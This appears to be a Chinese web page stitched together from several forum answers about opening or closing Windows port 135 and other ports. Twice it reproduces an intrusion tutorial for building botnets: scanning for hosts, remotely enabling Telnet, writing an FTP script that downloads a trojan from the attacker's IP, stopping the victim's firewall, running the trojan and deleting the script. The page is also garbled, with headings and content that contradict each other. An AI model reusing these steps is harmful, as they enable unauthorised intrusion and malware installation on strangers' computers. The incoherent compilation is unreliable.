windows之家1.如何打开135端口?
在介绍各种端口的作用前,这里先介绍一下在Windows中如何关闭/打开端口,因为默认的情况下,有很多不安全的或没有什么用的端口是开启的,比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。
为了保证系统的安全性,我们可以通过下面的方法来关闭/开启端口。 关闭端口 比如在Windows 2000/XP中关闭SMTP服务的25端口,可以这样做:首先打开“控制面板”,双击“管理工具”,再双击“服务”。
接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol (SMTP)”服务,单击“停止”按钮来停止该服务,然后在“启动类型”中选择“已禁用”,最后单击“确定”按钮即可。这样,关闭了SMTP服务就相当于关闭了对应的端口。
开启端口 如果要开启该端口只要先在“启动类型”选择“自动”,单击“确定”按钮,再打开该服务,在“服务状态”中单击“启动”按钮即可启用该端口,最后,单击“确定”按钮即可。 提示:在Windows 98中没有“服务”选项,你可以使用防火墙的规则设置功能来关闭/开启端口。
常见网络端口 21端口 端口说明:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算机作为FTP服务器,可以采用匿名(anonymous)登录和授权用户名与密码登录两种方式登录FTP服务器。目前,通过FTP服务来实现文件的传输是互联网上上传、下载文件最主要的方法。
另外,还有一个20端口是用于FTP数据传输的默认端口号。 作者: 222.83.180.* 2005-6-15 05:12 回复此发言 17 接上 在Windows中可以通过Internet信息服务(IIS)来提供FTP连接和管理,也可以单独安装FTP服务器软件来实现FTP功能,比如常见的FTP Serv-U。
操作建议:因为有的FTP服务器可以通过匿名登录,所以常常会被黑客利用。另外,21端口还会被一些木马利用,比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。
如果不架设FTP服务器,建议关闭21端口。 23端口 端口说明:23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序。
同样需要设置客户端和服务器端,开启Telnet服务的客户端就可以登录远程Telnet服务器,采用授权用户名和密码登录。登录之后,允许用户使用命令提示符窗口进行相应的操作。
在Windows中可以在命令提示符窗口中,键入“Telnet”命令来使用Telnet远程登录。 操作建议:利用Telnet服务,黑客可以搜索远程登录Unix的服务,扫描操作系统的类型。
而且在Windows 2000中Telnet服务存在多个严重的漏洞,比如提升权限、拒绝服务等,可以让远程服务器崩溃。Telnet服务的23端口也是TTS(Tiny Telnet Server)木马的缺省端口。
所以,建议关闭23端口。 25端口 端口说明:25端口为SMTP(Simple Mail Transfer Protocol,简单邮件传输协议)服务器所开放,主要用于发送邮件,如今绝大多数邮件服务器都使用该协议。
比如我们在使用电子邮件客户端程序的时候,在创建账户时会要求输入SMTP服务器地址,该服务器地址默认情况下使用的就是25端口 端口漏洞: 1. 利用25端口,黑客可以寻找SMTP服务器,用来转发垃圾邮件。 2. 25端口被很多木马程序所开放,比如Ajan、Antigen、Email Password Sender、ProMail、trojan、Tapiras、Terminator、WinPC、WinSpy等等。
拿WinSpy来说,通过开放25端口,可以监视计算机正在运行的所有窗口和模块。 操作建议:如果不是要架设SMTP邮件服务器,可以将该端口关闭。
53端口 端口说明:53端口为DNS(Domain Name Server,域名服务器)服务器所开放,主要用于域名解析,DNS服务在NT系统中使用的最为广泛。通过DNS服务器可以实现域名与IP地址之间的转换,只要记住域名就可以快速访问网站。
端口漏洞:如果开放DNS服务,黑客可以通过分析DNS服务器而直接获取Web服务器等主机的IP地址,再利用53端口突破某些不稳定的防火墙,从而实施攻击。近日,美国一家公司也公布了10个最易遭黑客攻击的漏洞,其中第一位的就是DNS服务器的BIND漏洞。
操作建议:如果当前的计算机不是用于提供域名解析服务,建议关闭该端口。 67、68端口 端口说明:67、68端口分别是为Bootp服务的Bootstrap Protocol Server(引导程序协议服务端)和Bootstrap Protocol Client(引导程序协议客户端)开放的端口。
Bootp服务是一种产生于早期Unix的远程启动协议,我们现在经常用到的DHCP服务就是从Bootp服务扩展而来的。通过Bootp服务可以为局域网中的计算机动态分配IP地址,而不需要每个用户去设置静态IP地址。
端口漏洞:如果开放Bootp服务,常常会被黑客利用分配的一个IP地址作为局部路由器通过“中间人”(man-in-middle)方式进行攻击。 操作建议:建议关闭该端口。
端口说明:69端口是为TFTP(Trival File Tranfer Protocol,次要文件传输协议)服务开放的,TFTP是Cisco公司开发的一个简单文件传输协议,类似于FTP。不过与FTP相比,TFTP不具有复杂的交互存取接口和认证控制,该服务适。
2.如何开启135端口
大家好 我是小毛,好多朋友问我申请不到FTP空间怎么给135肉鸡种马,所以今天给大家讲的是更快更准的 抓135肉鸡,呵 注:本教程只适合新手看,老鸟们就不必看了哈,小鸟蛋我说的有什么不对,还请大家多多指导 好了下面介绍下需要用到的工具 Serv-U(在本机建立FTP) NTscan(135扫描工具) Recton(远程开23端口) EvID4226Patch(XP线程修改工具) 灰鸽子木马一个 OK 上面的工具准备好后我们就可以开工了``~~》》》》》》》》》》》》》》》》》》》》》》》 首先给大家介绍下如何使用Serv-U 看操作····· OK FTP好了后就把自己的木马放在你的FTP里吧 下面我们打开EvID4226Patch(这是个以外收获,本是用打来使用S.EXE的,没想到也加速了NTscan) EvID4226Patch设置的顺序依次为 C 1000回车 Y 在8秒左右会出现文件保护,大家点取消 就OK了 下面我们打开NTscan扫135(个人觉得先看下自己的IP,然后扫描自己IP很近的IP,速度快效果佳) 看操作···· 58.241.227.242 慢````正在连接 58.241.227.242 。
连接成功!正在检查Telnet服务状态 。
Telnet服务已被禁止!正在改变启动类型为 Manual(手动) 。
正在改变服务状态 。
正在设置 NTLM=0 。
正在设置 端口=23 。
Telnet服务已经成功打开!端口:23 . 好了 已经扫到好多了然后用Recton开它的23端口 好了 咱可以去telnet了````~ 下面就是给它上个马 这下就要用到 Serv-U了 启动FTP~~ ( 如怕有失误可在浏览器里输入ftp://自己的IP) telnet上去后咱要给它种马啊,要不进来干嘛 对不````呵呵 找个安全的地方传 面的人家断开的时候 你的FTP帐号和密码还在上面呢```` 命令: echo open 58.241.227.58>>zxq.txt 登陆地址 echo zxq>>zxq.txt 用 户 名 echo 123456>>zxq.txt 密 码 echo bin>>zxq.txt 开始登陆 echo get 135.exe>>zxq.txt 下载木马 echo bye>>zxq.txt 退出登陆============================================================================================ (#以上命令会在在对方的电脑里形成一个zxq.txt的文本,文本里具体什么内容我就不多说了 自己实验吧#)=========================================================================================== net stop sharedaccess 关闭防火墙 ftp -s:zxq.txt 运行zxq.txt脚本参数 收到 1507840 字节 135.exe (1507840 Bytes). 好了 咱dir下 看看下载文件的大小是不是和你木马文件的大小一致,如不同,说明你的马给杀 了 怎么办?(一可以用Recton关它的杀毒软件 二让自己的木马面杀 三放弃) 。
打错命令了 呼``` - -!! 运行木马程序 然后就 del zxq.txt 删除zxq.txt 晕 还在上面闷``` 在运行试试``` 哈哈 没了 exit 退出telnet 好了 等着可爱的鸡鸡上线吧````~~ 上线了, 看看他干什么了````` 呼 和我一样的桌面 我还以为我自己入侵自己呢 闷。
3.请问怎么打开自己电脑的135端口
其实是服务TCP/IP NetBIOS Helper被关了,在--开始--运行--services.msc--找到TCP/IP NetBIOS Helper开启就可以了.PS:135端口开放实际上是一个WINNT漏洞,开放的135的端口情况容易引起自外部的"Snork"攻击!!!
对于135端口开放的问题,可以在你的防火墙上,增加一条规则:拒绝所有的这类进入的UDP包,目的端口是135,源端口是7,19,或者135,这样可以保护内部的系统,防止来自外部的攻击。大多数防火墙或者包过滤器已经设置了很多严格的规则,已覆盖了这条过滤规则,但任需注意:有一些NT的应用程序,它们依靠UDP135端口进行合法的通讯,而打开你135的端口与NT的RPC服务进行通讯。如果真是这样,你一定要在那些原始地址的系统上(需要135口通讯),实施上述的规则,指定来自这些系统的通讯可以通过防火墙,或者,可以被攻击检测系统所忽略,以便维持那些应用程序的正常连接。
4.怎样打开135端口
Windows XP系统 运行dcomcnfg,展开“组件服务”→“计算机”,在“我的电脑”上点右键选“属性”,切换到“默认属性”,取消“启用分布式COM”;然后切换到“默认协议”,删除“面向连接的TCP/IP”。
以上选项有对应的注册表键值,因此也可通过注册表来修改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM的值改为“N” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\DCOM Protocols 中删除“ncacn_ip_tcp” 此外,还需要停用“Distributed Transaction Coordinator”服务。 重启之后, 135端口就没有了。
Windows 2000系统 前面的步骤和在XP下相同,只是需要多停用一个服务,“Task Scheduler”注意dcomcnfg的界面稍有不同,不过内容是一样的。 Windows 2003 以上方法在2003下无效,目前我只找到一个折中的方法。
默认情况下,135端口是在所有地址上监听的,如果只在本机回环地址上监听,也不失为一种解决办法。要想改变135监听的地址,需要Windows Server 2003 Resource Kit tools中的rpccfg.exe。
首先看一下网卡上都有哪些网段:rpccfg -l,一般情况下输出如下: 1 127.0.0.0 1 MS TCP Loopback interface 2 192.168.0.0 1 Realtek RTL8139/810x Family Fast Ethernet NIC 然后输入;rpccfg -a 1。这样只有本机回环地址才开放135端口。
^-^。
5.如何开启自己的135网络端口
大家好 我是小毛 ,好多朋友问我申请不到ftp空间怎么给135肉鸡种马,所以今天给大家讲的是更快更准的 抓135肉鸡,呵 注:本教程只适合新手看,老鸟们就不必看了哈,小鸟蛋我说的有什么不对,还请大家多多指导 好了下面介绍下需要用到的工具 serv-u(在本机建立ftp) ntscan(135扫描工具) recton(远程开23端口) evid4226patch(xp线程修改工具) 灰鸽子木马一个 ok 上面的工具准备好后我们就可以开工了``~~ 》》》》》》》》》》》》》》》》》》》》》》》 首先给大家介绍下如何使用serv-u 看操作····· ok ftp好了后就把自己的木马放在你的ftp里吧 下面我们打开evid4226patch(这是个以外收获,本是用打来使用s.exe的,没想到也加速了ntscan) evid4226patch设置的顺序依次为 c 1000回车 y 在8秒左右会出现文件保护,大家点取消 就ok了 下面我们打开ntscan扫135(个人觉得先看下自己的ip,然后扫描自己ip很近的ip,速度快效果佳) 看操作···· 58.241.227.242 慢```` 正在连接 58.241.227.242 。
连接成功! 正在检查telnet服务状态 。
telnet服务已被禁止! 正在改变启动类型为 manual(手动) 。
正在改变服务状态 。
正在设置 ntlm=0 。
正在设置 端口=23 。
telnet服务已经成功打开!端口:23 . 好了 已经扫到好多了然后用recton开它的23端口 好了 咱可以去telnet了````~ 下面就是给它上个马 这下就要用到 serv-u了 启动ftp~~ ( 如怕有失误可在浏览器里输入ftp://自己的ip) telnet上去后咱要给它种马啊,要不进来干嘛 对不````呵呵 找个安全的地方传 面的人家断开的时候 你的ftp帐号和密码还在上面呢```` 命令: echo open 58.241.227.58>>zxq.txt 登陆地址 echo zxq>>zxq.txt 用 户 名 echo 123456>>zxq.txt 密 码 echo bin>>zxq.txt 开始登陆 echo get 135.exe>>zxq.txt 下载木马 echo bye>>zxq.txt 退出登陆 ============================================================================================ (#以上命令会在在对方的电脑里形成一个zxq.txt的文本,文本里具体什么内容我就不多说了 自己实验吧#) =========================================================================================== net stop sharedaccess 关闭防火墙 ftp -s:zxq.txt 运行zxq.txt脚本参数 收到 1507840 字节 135.exe (1507840 bytes). 好了 咱dir下 看看下载文件的大小是不是和你木马文件的大小一致,如不同,说明你的马给杀 了 怎么办?(一可以用recton关它的杀毒软件 二让自己的木马面杀 三放弃) 。
打错命令了 呼``` - -!! 运行木马程序 然后就 del zxq.txt 删除zxq.txt 晕 还在上面闷``` 在运行试试``` 哈哈 没了 exit 退出telnet 好了 等着可爱的鸡鸡上线吧````~~ 上线了, 看看他干什么了````` 呼 和我一样的桌面 我还以为我自己入侵自己呢 闷。
6.请问135,445端口在哪里打开.具体点.对应服务是什么
Windows2000的445端口
概要:
在windows2000中出现了一个以前没有用过的端口455。
概念:
SMB(Server Message Block)
Windows协议族,用于文件和打印共享服务。
NBT(NetBIOS over TCP/IP)
使用137, 138 (UDP) and 139 (TCP)来实现基于TCP/IP的NETBIOS网际互联。
内容:
在Windows NT中SMB基于NBT实现。
而在Windows2000中,SMB除了基于NBT的实现,还有直接通过445端口实现。
当Win2000(允许NBT)作为client来连接SMB服务器时,它会同时尝试连接139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,以455端口通讯来继续.当445端口无响应时,才使用139端口。
当Win2000(禁止NBT)作为client来连接SMB服务器时,那么它只会尝试连接445端口,如果无响应,那么连接失败。(注意可能对方是NT4.0服务器。)
如果win2000服务器允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放。
如果 NBT 被禁止, 那么只有445端口开放.
好了,如果我们在win2000上运行一些工具利用null session列举出对方机器的一些有用资料时,应该把我们机器上的NBT设为允许。
7.135端口怎么开
135端口
端口说明c-serv MS RPC end-point mapper Microsoft在这个端口运行DCE
RPC end-point mapper为它的DCOM服务。这与UNIX 111 端口的功
能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper
注册它们的位置。远端客户连接到机器时,它们查询end-point
mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到
诸如:这个机器上运行ExchangeServer吗?是什么版本?
关闭方法:用一款16为编辑软件(推荐UltraEdit)打开你系统
winnt\system32 或者 x:\windows\system32下的rpcss.dll文件。
查找31 00 33 00 35
替换为30 00 30 00 30
查找3100330035,将其替换为3000300030,意思就是将135端口
改为000。至此修改的任务已经完成,下面将面临一个保存的问题。
因为该文件正在运行,在Windows环境下是不能覆盖的。如果你是
FAT32文件系统,那么直接引导进DOS环境,将修改好的文件覆盖掉
原来的文件。
如果是NTFS格式,相对就麻烦一些。进安全模式。然后启动pulist列
出进程,然后用pskill这个程序(黑客网站有下的)杀掉svchost.exe
程序。然后在COPY过去。
覆盖后重新启动,使用netstat -an命令,可以看到Windows 2000下
已经没有135端口了。XP系统还有TCP的135,但是UDP里面已经没有
135端口了。
看看!可以不?
8.如何开135端口
开启RPC服务
由于通过135网络端口,只能远程运行一些通过DCOM技术开发出来的应用程序,而DCOM技术在通信过程中,需要用到RPC服务;因此如果将服务器中的RPC服务启用的话,就能达到开启135网络端口的目的了。在启用RPC服务时,可以依次单击"开始"/"程序"/"管理工具"/"服务"命令,在随后打开的"服务"列表中,双击其中的"Remote Procedure Call"选项,打开如图1所示的设置界面,将该界面的启动类型设置为"自动"选项,再单击一下"应用"按钮,再单击界面的服务状态"启动"选项,单击一下"确定"按钮,服务器的RPC服务就会被启用了。
转载请注明出处windows之家 » win10的135端口如何打开